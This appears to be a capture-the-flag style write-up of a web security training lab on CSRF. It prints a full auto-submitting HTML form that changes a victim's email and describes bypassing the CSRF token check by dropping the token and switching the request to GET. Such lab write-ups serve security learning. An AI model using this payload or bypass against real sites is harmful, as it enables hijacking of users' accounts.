We logged in using the credentials that were given to us :
We were able to see that a csrf key was also send along the request when updating our email :
As the previous Lab - CSRF vulnerability with no defenses , We added the Javascript tag to automatically submit our request and edited the spacing using chatGPT :
<!DOCTYPE html>
<html lang="en">
<head>
<title>Form CSRF PoC</title>
</head>
<body>
<h1>Form CSRF PoC</h1>
<form method="POST" action="https://0a850080036f0b4a81930cda00680002.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="hello@haha.com">
<input type="hidden" name="csrf" value="TimXx6Y5XLn3SUIHUwmA5YmrUp2jY9te">
<input type="submit" value="Submit Request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Our exploit worked when testing with the local Exploit server :
However, Sending the exploit to the victim didn’t solve our challenge.
We removed the csrf value and checked the exploit locally but received the below response:
Changing the request method to a GET bypassed that prompt and changed the email and the exploit worked :
No error messages was generated :
